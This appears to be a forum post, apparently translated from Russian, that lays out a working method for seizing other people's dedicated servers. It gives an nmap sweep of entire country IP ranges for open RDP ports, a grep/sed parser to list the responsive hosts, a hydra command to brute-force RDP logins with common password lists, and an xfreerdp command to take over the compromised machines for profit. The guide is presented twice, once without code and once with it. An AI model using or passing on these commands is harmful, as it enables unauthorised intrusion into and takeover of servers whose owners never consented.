CYBERSATORI EXPERIENCE 4 CAPTURE DEDICATED SERVERS ON LINUX SYSTEM // My experience in capturing dedicated servers
CREATE NMAP SCRIPT FILE (Input All Major-IP Blocks of any Country here): // Wrap up next few rows in script, create a few txt files
http://www.ipdeny.com/ipblocks/ - here you can look on ip block lists for interesting us country but if you will scan all for one time you will see the results only on the next year.
So don't be greedy and scan for a little interest subnet, keeping journal and write scanned diapasons.
CREATE PARSER FILE (to select only OK IP's list): // create a sorting machine which will extract ip's with opened RDP port
PUT HYDRA COMAND (Best 4 Brute on Linux or use Metasploit experience): // nothing more funnier than hydra was not found, crowbar gives misses and stunnes,
so upload a few top ten dictionaries (admin - password) Hydra is good because not so more load the processor and can brute all day, all night without pause.
The best solution I think is to exploit sorted ip's with help of Metasploit but it is a theme for another article because fast and standart solutions for this i do not see.
TO CONTROL REMOTE DESKTOP : // enter to exploited shells and take profit
Good Luck and feel free to comment.
We are anonysts we are Legion.
source: В поисках лучшего алгоритма по захвату дедиков в 2К18
CREATE NMAP SCRIPT FILE (Input All Major-IP Blocks of any Country here): // Wrap up next few rows in script, create a few txt files
http://www.ipdeny.com/ipblocks/ - here you can look on ip block lists for interesting us country but if you will scan all for one time you will see the results only on the next year.
So don't be greedy and scan for a little interest subnet, keeping journal and write scanned diapasons.
Код:
c='Path/To/Your/Script/Here'
nmap -sS -p3389 -PS3389 -oG $c/scannedOnlineServers.txt -iL $c/hostsIPRange.txt -vvCREATE PARSER FILE (to select only OK IP's list): // create a sorting machine which will extract ip's with opened RDP port
Код:
p='/Path/To/Your/Script/Here'
grep -E '/open/' $p/scannedOnlineServers.txt | sed 's/Host: //' > $p/scanGhostFile.txt
sed 's/ .*//' $p/scanGhostFile.txt | sort | uniq -u > $p/openedServers.txt
sed 's/ .*//' $p/scanGhostFile.txt | sort | uniq -d » $p/openedServers.txt
rm $p/scanGhostFile.txtPUT HYDRA COMAND (Best 4 Brute on Linux or use Metasploit experience): // nothing more funnier than hydra was not found, crowbar gives misses and stunnes,
so upload a few top ten dictionaries (admin - password) Hydra is good because not so more load the processor and can brute all day, all night without pause.
The best solution I think is to exploit sorted ip's with help of Metasploit but it is a theme for another article because fast and standart solutions for this i do not see.
Код:
hydra -L (loginTop10listHere) -P (passTop10listHere) -M (openedServersHere) -vV -o (SavedOKServers) rdpTO CONTROL REMOTE DESKTOP : // enter to exploited shells and take profit
Код:
xfreerdp /u:LOGIN /p: PASSWORD /v:IP:3389Good Luck and feel free to comment.
We are anonysts we are Legion.
source: В поисках лучшего алгоритма по захвату дедиков в 2К18
